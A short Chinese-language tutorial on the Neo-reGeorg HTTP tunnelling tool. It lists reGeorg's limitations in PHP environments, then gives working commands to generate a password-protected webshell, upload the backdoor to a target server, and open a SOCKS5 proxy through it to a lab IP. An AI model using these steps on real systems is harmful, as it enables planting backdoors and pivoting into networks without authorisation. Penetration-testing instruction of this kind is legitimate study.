Neo-reGeorg是常见的http正向隧道工具,是reGeorg工具的升级版。增加了很多特性,例如像内容加密、避免被检测、请求头定制、响应码定制、支持py3等等
reGeorg:
- 1,在aspx和jsp环境下可以正常使用
- 2,php环境中tunnel.php文件要依赖dl("php_sockets.dll");通过dl函数加载扩展,这种方式局限性很大,很多环境下都不支持dl函数。
- 3,tunnel.nosocket.php文件虽然可以不依赖dl函数,但是使用了flush()这个函数,部分PHP环境也不支持flush()函数,比如PHPstudy。
于是有大佬在reGeorg的基础上,做了重构,完成了Neo-reGeorg。
下载地址:
https://github.com/L-codes/Neo-reGeorg
生成webshell,密码为shy
py -3 neoreg.py generate -k shy
在生成的webshell中选择目标机对应语言的后门上传
使用浏览器访问没有报错
使用本地4444端口建立socks连接:
py -3 neoreg.py -k shy -u http://192.168.138.129/tunnel.php -p 4444
测试代理:使用代理访问搜狗curl -x socks5h://127.0.0.1:4444 https://www.sougou.com/
通过测试,发现原来Neo-reGeorg建立的是socks5代理。其他协议都不行。